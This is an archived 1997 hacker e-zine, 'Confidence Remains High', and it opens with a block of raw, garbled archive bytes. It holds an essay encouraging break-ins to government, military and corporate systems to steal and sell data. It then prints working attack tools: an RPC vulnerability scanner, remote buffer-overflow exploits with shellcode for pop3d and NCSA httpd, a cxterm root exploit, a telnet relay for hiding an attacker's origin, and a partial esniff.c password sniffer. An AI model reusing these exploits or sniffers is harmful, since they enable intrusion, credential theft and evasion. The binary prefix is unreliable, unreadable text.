J?bmv3֔ϔ\ZY?ޘM @Zy9+l!.h=G|v=GEq8dd3)aojH^Mene:%;|tmxhm9vuIG׌$d##k Mive*lŎ.єzٙ}fњePfb{CTĵ_6)%|0sbu_zD(f,H R6ռ\c7f4{,UjP pe@'__~R8C4Fϣ^ (UCY,ΓC~b^ Wdy؏W\t)&.ߡG '1g_2Cӵݎ|b%@Fv'oqO0f2M)'hxS(t8/ 1.W}kTy9϶ W~ncN]9wvR#f!R1]>bՒe[؂-;x'sx&e~*9XEc9A#PLF=23' afۃ%{gӭkK@B~8 f6xYējz^GA8;4(aR7Qк:[DF.˖ƸomL{':x֞C=b m| jb[79ޭs?( r ~F?znyYF;GAy$W}O\ n$]+Wi|j齃[ҥRf|e{OIM91{VWӢi6z  ρ@ m3K[zbtZ=,EE38NѣMZF{x~yjB n}*4J%4~W T;`?оiuөGwS`y=uZJ/ {1}Eg{r33$X{3_*5}nuQ"lQ]Ndj*{Q+msD^|_ >] Tٱ2,.,bBB6. lA<3Dnm r];P^pbSn~K$A(*- ?ZbOAy!V102v򠟲NѝhK'%CZ(R_WTxc%X'b6S[LhG*/T;U";`F8Z fYt=]t[yy 5 %%,IG݆>D#u^< f^D53GCj'HXoo $QGDebCl0Cl>bEq$qZ-h WP_ ;Ց$ Q}R{CY1on԰ _[ `1dDžoP&OH'OD ݸ;#+O΢4m9SL\ P „s .:X(o2xq]ys~AHa\2i*|WV#qȪ^^ûn碒*n`E֩e g gLA\oZZJj{ %&}/s9:, Ou^"ˋTRğr4>.EJN-ASzs59Œ V!5h7 kqO Ty Ԑz:_R5(;{d4KLzw8=ݪK8}4zNӕN83WT۞YuqX|zSa0c-ZB߲=8<]6݋˄9 B*s6d艊>klIUSQޓMAQ=gߪz<U|H A43q5STb6m3pv>6"AA0e-7.tXkAS; V't(WHOsXez>9/.a@o-I`,7*C%ƽǧf OdًM%Z< CeZ%{D[QM>aO|}OYo$( ÿ 1eUuCq={ XT77H ,bSw7HvL a|!H[C8$ +R\Ip`:sT-T 1LJt[rXahConE+&+⍵)ѭꖐZJPQoJCPn. PRB1<;F`Qcoa >9JQ&l'Ezi[ek &D 6If1hI >,>Kqv?\P xO56 hv_1ކrNK>bȫUg<`G~bA^vyÓ b+~X][`_RFoS|^Km&^#'|]$'Wd؊:V Ժgxi`;2 y\kVK?s Jܮ1Rߔ IŌs7o*jgO7$5&hp޾+X ]I*MٶD[n q &Svs E[m "ǹ%S=Aϋ pWiGÓBG[9'-D0AF80#tѿAG Yu)u "oĩ0OxfaOT3V˟ \?NKqxt;@qELG9mFX^-FAPk4PLFDe[;CCL2OhePY4|~'$ShÆ{U{Mv)En&Հcr(sq jivGL p'' blE{{KM#Nh4ttwh!\.6,.|UbCd}g1A鹠Q >~aL 5wO P?c= x_t(t/)BYe^2bdF{C #i JZ V f_N/T1;)L8cQ}:ASQ ;.a92&N= P3 60l9BiEGf| V"!?HZN|7w8gITFe(drԙ6'>Vdt3)63ouN^a0z1B;Ґ\$m-O%<5i5Sc,r%ilSt{, O~ѭ=qeB`23jwhMmK!@!XIm#>BGӦ"%̋CNF1m,dTNy[U8ܓ\v7 0w2!Z%/ťUyn*;RTT K>cmC_E«R6bco: ١G&3 *cm?w 'j^ s*|MF&xX`P[zx^"$v=Dok!pj[),mQ6uCZé`DdН#TAGIbDLRQo3.wlN#BYy(%C'm;RB@_ >)֯ s~-`lCj&L#sK>tvwAu Lhɯjv`c"^{ o~!tx0"T2bwKڻp%l[ĀH( VR"L> ME7lHRj! U-QQ-,w=˦ atvHf3ý'Nc IcleK],)nS!;Ŧj5y: tCĸԴ;3"hHVX4Pv0ѤQĻlCV)}!.OLŲre :;9<}ҋʾm* S^P%&ȿ PXvSZY:r9R#^E\ҌYEOt/xh9M,Ca$cݔ"[42x;;_<~ߢm/ &Cp$mh},FIcOVd{ 8ByHtP@0âUů=UKgP')0Pn08 z}[os%Y[[l@I1ۄbd2d9ýʽ~ƪǸ3|=`1!0?[{{2vnOj@o}-'}*h||9A>PV,_N>`w H =G~243MLnpLFvalFNH{ ;r+B.S=RpNabK OBmw{`noKBK9MSzw-A|7Q4]+X'gSWǔ |I͒ǎN\&e}4? Z*|k najف!nQE=x1%A\ i3glf=z/A̍r͸-dL\m_/1,Zjnñ iEAԁԄ=N*,|"ڭ[CAdЏS0FۓieMY?Xk4:qӐ-~P4eZm^|*e Lo:,pfFaFA~ C $60N_PKRvG#M WAREZ.ZIPuyUP$ ={w@ =,nKp-Np]|׮n-UdB$ R|(E* 6& \j>; :fS4'?Ԩc2jЪ,0*,`\WgmUǮ^p/锹%r|k zoD6H6[݇"|s(A:w꘽A!'0@Bx! )G,;Z3Sސ Qو L@䩡ηCaD<-ʪ5RJ!񯇹L=3]#sFy8DH5XF9,C 2D+}?(`ӚA#PF0K+6M) c;פe䖚 Xt{WCoEI Y&iIMF'˴8%5Wt^.cIz4Q$c\%fZ$Sk˚<q)/,qvO0:n…jo%xuGkgZ'SQ^V9֭UբSO_DWywHmS*K/O${#VQ?j}x\(Zw xw}p\b={x=w6!8q>}E ܞӕRדz$t&.`Ufi+:=M˹Ɉ WZ^{q e$Jb m8 l9ixjp`ҏ3} w1\npp<3Ku"y٢hψJjn3߮AO!0޷ۻ;WNjJc^wh~0 fO(mܰvpc)TtG힨FWUmi1ozWv4%x@Cޢ~:wcbN$Vϻ/ ˜ҽxAN]LZ+4? +$m!n:ЄT6 ĺ7[4tzi?TpƙpZΟԫa8T55D#3k1hNJ#=(Ot.%Χ])ԏʳQ {.>;_z<F XtO+0ْx-ڎ)TCܘ?ϲ Ͳ1f4@Y(n},P MZq)qbjPዋUTH4Mٿx\c?Agaxh }۬ {-xn?a2q c.F3z^6TC;Ɇtc埒.rv*1P|BZnnq崕HѬ1=+/O):I?|/B"j/W9EdwUX4qgKLDmDUСLd[[*R Ƶ<?%X^uc̈́ RQUɕ,0cjXMOwmТ\mEW t.NOhřA!~x2gnW-7m,!JQ+cb笫58CMv@"t.H0Kiҹ7H<Ï}!9U5Uj`!YWڪ&cE~mF'`I^iJcyQ}͏= Kά;NauKS-C IHafU9 G;G~fa3z8/'̨ ^PƱ Wzk0=D<ؿ9hV)~@Eh_Z"0x:TUژYTU U":!=?*.-*}@Cԓ;Hw;G NoҸl"Z -/\o̯֮Œj0秧;BģVѓ8̊iI{G=ME!;z!g:]K0Yw)S9LUL!}Gi0f"g̟5S\TY?d˘L06chrʼ訐h|zWK>n!L#Nu`@L#p9(-[·֒ 9W;t%0.VI MSV"zLq(~i҄{kþeU:"'BfrqlYe|lg}66Y|@4ŒӠ4W.]%q TzF0/ ܆N#4 L@wb! t^/߼$ oD'zZ5:c 6 ǚ_M`ɃhŚ㌱eE @Q{ * 4-u.=fJkj52*{ /Qke' ͯ%F8H+.ؿS(~qzHsN:;ߎ>f =-ʴg1q*1廪VWb5ppC$3t<ړ4pG_P*AҶfurAGza{FCӏEakLk|zU=b9$"9%& 0eJGɧs$|jcN]*bGD۹Y/q"_V" Hfm#!)-ۓ$H7{x,$2Axnv,  CyaVڟR8 8-V2^Μ7/AbU\Mbq %"cUO+S<_-N2>*-ˏKp)we$ 7B ۾s{3i6 Geu} T'-Y'WNޖQ  /@gc~))rt\>6XAr~fp]5Lܖn,tt9M@ 檑J▉<~ ]80 ӟm |MH9wusEW|Qiv[l{|ՃBrjR$fbOA,"Vg' )~OrXG@,'yUBuX1ty-` iuPF1E]ƹlv,q^) #?EZ' "ކ#I]a|Kg;Q5; Ef~f;3O_EO(^AWǹ%"TN$-;p)3w Lle<2ˈUӦ!$v89@0?_HV@LI.pIĔRGkN965Q-n=xeܮ7?ZqpzMȬp֢xm EM8nw)qKf+f)N i8:Y}K>aSd%\gdM;ᖊ"NڦCj|=6d&, k~s~p,& __AM@`ZfE:^ASb>nR(\'4U&5#m)ԻatasI *'ؑ*:]f 4y&7g 93TO_k L\Cr(zְ?sjMfm[9v:uL&{-|瑞΂rHL)h028YVu7 v#kBA qkSI'ZW5'= c~C6.NRγK4ղȫh+hٌZ lbkA$ζIDk|fFm4hk%c:oy= h E>I J qCۮ{Yh{-!E~hjFt]7S] yꨟ޵)BS"!L7>~L}{2nBas8O œdAtQa~%!̚N̖>7Y23%d5wNgZu~xZV_|9p-~G7`$9N5wd=|%ha^ױg_r%k#'Oq7qZXEkn|`iy1a\{侘1\Ԥ=.hg'F-%haW.vTcrǍY7X Q]=ue#ł]i[L5Q!3R1u\[2-]WNeWP]RWr1W+Z8S ,#я*c' z,qСլZuV#Ux먓y#AoUeU"8 TXװkHWL&BjhB fljC%۱U^EX#fD b]S]ݐ*LY/`d2طÊ̈́pai{~ElrB%2&]'A⥈:nV]={ۿ ƭ~=EqMsG>BOԊpUņ=?m |A߭ABU MrmAϬPptm~[㷇岂\jJ^g?pƾ^͠gBUPWۂ6ĹܗŹ.@sҢjnR6o2 5HR<k{wJr^܎}dą X8$|FHQrqH7>7qeENSmNu {V3\eb0G.JtIp-Ci񟟟EXM8>ѡ۾&b;r񀮬'm Oxw cD/Qv[B() _D\LT)".7kWRVr]D&z?Ύ$#5ȇ_Of.GEVPccYIG;CREDr Tk'_TԊTQCO:'PPK2 tG#/ys crh666.txtPK2 A#'Q H1p1 >Shokdial.tgzPKRvG#M WAREZ.ZIPPKcrhsum97.txt100644 1751 12 167101 6361315732 10771 0ustar wheel .oO The CodeZero Oo. .oO Presents Oo. Welcome to the special summer editon of... /IIIIIIIIII /IIIIIIIIII /III /III \ III_____/ \ III___/III \ III \ III \ III \ III \ III \ III \_III \ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh \ III \ III__/III \ III__/ III \ III \ III \ III \ III \ III \ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___ \_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\ \/__/ \/__/ \/__/ Summer 1997. CRH Editor : Tetsu Khan Official CRH Kung-Fu Film : Turf On A Rope Official CRH Pimp : so1o Official CRH Spic With A Red Hat : xFli Official CRH T-Shirt Supplier : NightRage Official CRH Visual Basic Coder : \\StOrM\\ aka Jason Sloderbeck Official CRH Print Brother : Digital Darkness .-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------' In This "Added Exploits" Issue : -----=> Section A : Introduction And Cover Story. 1. Confidence Remains High special summer edition.....: Tetsu Khan 2. The network is our playground......................: so1o -----=> Section B : Exploits And Code. 1. RPC-Check.sh.......................................: yo 2. Linux pop3 remote exploit..........................: Savage 3. Linux HTTPD 1.3 remote.............................: Savage 4. Telnet gateway.....................................: Chaos 5. 0wned.c............................................: so1o 6. Cxterm exploit for Linux...........................: Ming Zhang 7. The king of all sniffers : esniff.c................: unknown 8. Linux nlspath exploit..............................: Solar Designer -----=> Section C : Phones / Scanning / Radio. 1. How to fuck over a UK payphone.....................: so1o / NightRage 2. Radio link for TI-85 calculators...................: Michael Jan -----=> Section D : Miscellaneous. 1. Test-cgi holes.....................................: so1o 2. Tree raping........................................: digitalboy [DD] 3. .htpasswd + .htaccess..............................: Cain [DD] 4. Simple NFS skills..................................: Cain [DD] -----=> Section E : World News. 1. LOPHT.COM..........................................: so1o 2. AAA Report.........................................: so1o 3. Lamer of the fucking year : pSId (DALnet)..........: so1o ------=> Section F : Projects. 1. STiK...............................................: mstrhelix -----=> Section G : The End. (+ Personal Column) =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== 1. Confidence Remains High Issue 4 : Tetsu Khan Issue 4 will be out at the beginning of September, so to last you through the long hot summer nights, we present the special summer issue of Confidence Remains High. Nothing really new in this edition, just a few programs to keep you thinking through the summer, as well as some cool submissions by members of Digital Darkness. But when you bundle this with CRH issue 3, it becomes cool :) Confidence Remains High distro site list... ------------------------------------------- http://insecurity.insecurity.org/codez/ http://www.r0ot.org http://www.exceed.net http://www.7thsphere.com/hpvac/hacking.html ftp://ftp.sekurity.org/users/so1o/ ...And alot of other sites, just go looking around. 2. The network is our playground : so1o Just sit back for a few minutes and consider how much power we have as hackers, from our Linux boxes, or Wind0ze systems, we can connect to many thousands of Government or Military sites, as well as company networks where useful information such as credit card details can easily be found, all we need is the knowledge of holes in such systems, the means to exploit these holes, and the skills needed to "root" the system, thats all it takes. In 15 minutes, a hacker could 0wn many important NASA systems, and then proceed to pull the following types of files from such a system... - Personnel information. - Mission reports and test results. - Satellite programs and information. - Future mission dates. Or say it was a military system, then that hacker, if he knew what he was doing would be able to gain access (with relative ease) to the following kinds of files... - Personnel information. - Weapons reports. - Tactical analysis. - Future mission dates. - Intelligence papers. Lets say that a hacker was to attack a company, such as Intel, then he would be able to access... - Product test results. - Internal mail between users. - Future plans or products. - Blueprints. ... then that hacker could sell off that companies research and development reports to others, and make some ca$h. It is clear to see, that from the power we have by just owning a computer and a modem is quite huge in the right hands, and that it is pretty simple to go out and find yourself some classified information if you really want to. =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== 1. RPC-Check.sh : yo #!/bin/sh #rpc.chk 1.0 # # Make sure you have got a newer version of Bourne Shell (SVR2 or newer) # that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS) # or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to # change the magic number, indicating the type of executable Bourne Shell. # # The script obtains via nslookup utility a list of hostnames from a nameserver # and checks every entry of the list for active rexd procedures as well as # ypserver procedures. The output is a list of the sites that run those # daemons and are insecure. # -yo. domainname=$1 umask 022 PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH # # Function collects a list of sites # from a nameserver. Make sure you've got the nslookup utility. # get_list() { ( echo set type=ns echo $domainname ) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$ 2>/dev/null if [ ! -s .tmp$$ ]; then echo "No such domain" >&2 echo "Nothing to scan" >&2 exit 1 fi for serv in `cat .tmp$$`;do ( echo server $serv echo ls $domainname ) | nslookup > .file$$ 2>/dev/null lines=`cat .file$$ | wc -l` tail -`expr $lines - 7` .file$$ | cut -d" " -f2 > .file.tmp # .file sed -e "s/$/.$domainname/" .file.tmp > .hosts$$ rm -rf .file* .tmp$$ sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$ done tr 'A-Z' 'a-z' HOSTS.$domainname;rm -rf HOSTS$$ } # Function rpc_calls() { for entry in `cat HOSTS.$domainname`; do ( rpcinfo -t $entry ypserv >/dev/null && echo $entry runs YPSERV || exit 1 # Error! ) >> .log 2>/dev/null ( rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD || exit 1 # Error ! ) >> .log 2>/dev/null done } # Main if [ "$domainname" = '' ]; then echo "Usage $0 domainname" >&2 exit 1 fi get_list echo "Checking $domainname domain" > .log echo "*****************************" >> .log echo "Totally `cat HOSTS.$domainname | wc -l` sites to scan" >> .log echo "******************************" >> .log echo "started at `date`" >> .log echo "******************************" >> .log rpc_calls echo "******************************" >> .log echo "finished at `date`" >> .log 2. Linux pop3 remote exploit : Savage /* * pop3d Linux/intel remote xploit by savage@apostols.org 1997-April-05 * * workz fine against old pop3d distributed with pine. * * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!! * * usage: * $ (imap 0; cat) | nc victim 143 * | * +--> usually from -100 to 100 */ #include char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; char username[1024+255]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(username);i> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username)-1 ] = 0; printf("USER %s\nPASS Yoshemite\n", username); } 3. Linux HTTPD 1.3 remote : Savage /* * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23 * * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of ToXyn !!! * * usage: * $ (hackttpd 0; cat) | nc victim 143 * | * +--> usually from -1000 to 1000 (try steeps of 100) */ #include unsigned char shell[] = { '/',0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76, 0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b, 0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff, 'b','i','n','/','s','h' }; char username[256+8]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(shell);i> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username) ] = 0; printf("GET %s\n/bin/bash -i 2>&1;\n", username); } 4. Telnet gateway : Chaos /* (--------------------------------------------------------) Telnet Gateway by Chaos (--------------------------------------------------------) Ever worry about some egotistical sysadmin getting pissed off when you hack his system, and having him trace it back to your local system? If you are like most hackers, even if you are careful and telnet through another system first, it is still fairly easy to trace back through. Using the following program bellow you can make it a real bitch for anyone to find where you are coming from, let alone what account. This program, which has only been tested on Sun OS, will allocate a port and set up a telnet gateway. Because this program only allocates a socket, in order for someone to trace it back to you, the sysadmin of the system it is set up on would have to monitor the socket and see where the connection is coming from, which is not very likely, the sysadmin already has plenty to do. This is setup currently to port 6969 and will run in the background. Be sure to call it something that will not gather any suspicion from anyone running ps -aux. This will also write to the file log, the date and time anyone uses the telnet gateway. Have phun! Thanks go out to al- for the original source code. */ #include #include #include #include #include #include #include #include #include #include #include #include FILE *errfd; static int serfd; struct sockaddr_in addr; char buffer[10][80]; int sockused[10]; int numports = 10; int numproc=0; died() { numproc--; wait3(NULL,WNOHANG,NULL); signal(SIGCLD,died); return; } init_io() { signal(SIGCLD,died); if ((serfd = socket(AF_INET,SOCK_STREAM,0)) <0 ) return(1); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = 6969; if (bind(serfd,(struct sockaddr *)&addr, sizeof(addr))) { fprintf(errfd,"ioinit cannot bind socket\n"); exit(1); } if (listen(serfd,5) == -1) { fprintf(errfd,"ioinit cannot listen at socket\n"); return(1); } return(0); } getconnect() { int s,length; struct sockaddr_in address; while(1) { length= sizeof addr; while ((s= accept(serfd,&address,&length))<0); wait3(NULL,WNOHANG,NULL); if (fork() == 0) /* child */ { system("date >>log"); numproc++; dup2(s,0); dup2(s,1); dup2(s,2); close(s); system("exec telnet"); kill(getpid(),SIGKILL); close(0); close(1); close(2); exit; } /* end child */ close(s); wait3(NULL,WNOHANG,NULL); } } main() { int i; char temp[80],*term; int fd; for(i=0;i<36;i++) close(i); errfd=fopen("ERR","w"); if(errfd==NULL) return(-1); setsid(); if(fork()!=0) return(-1); init_io(); getconnect(); } 5. 0wned.c : so1o /* THIS IS FUCKING PRIVATE SHIT, DONT DISTRIBUTE IT!@# */ /* I CODED THIS QUICKLY ONE NIGHT, IT WILL ROOT ANY LINUX 2.0.x BOX */ /* -D-O- -N-O-T- -D-I-S-T-R-I-B-U-T-E- */ /* so1o@insecurity.org */ main() { char a1='j',a2='0',a3='a',a4='r',a5='3'; char b1='w',b2='n',b3='d'; printf("%c%c%c %c%c%c\n",a1,a2,a2,a3,a4,a5); printf("%c %c %c %c %c\n\n",a2,b1,b2,a5,b3); printf("By so1o@insecurity.org 1997\n"); } 6. Cxterm exploit for Linux : Ming Zhang /* cxterm buffer overflow exploit for Linux. This code is tested on both Slackware 3.1 and 3.2. Ming Zhang mzhang@softcom.net */ #include #include #include #include #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i,OffSet = DEFAULT_OFFSET; /* use a different offset if you find this program doesn't do the job */ if (argc>1) OffSet = atoi(argv[1]); buff = malloc(2048); if(!buff) { printf("Buy more RAM!\n"); exit(0); } ptr = buff; for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE; i+=NOP_SIZE) { memcpy (ptr,nop,NOP_SIZE); ptr+=NOP_SIZE; } for(i=0;i < strlen(shellcode);i++) *(ptr++) = shellcode[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_sp() + OffSet; ptr = (char *)addr_ptr; *ptr = 0; (void) fprintf(stderr, "This bug is discovered by Ming Zhang (mzhang@softcom.net)\n"); /* Don't need to set ur DISPLAY to exploit this one, cool huh? */ execl(CXTERM_PATH, "cxterm", "-xrm",buff, NULL); } 7. The king of all sniffers : esniff.c : unknown /* [JOIN THE POSSE!] */ /* Esniff.c */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ 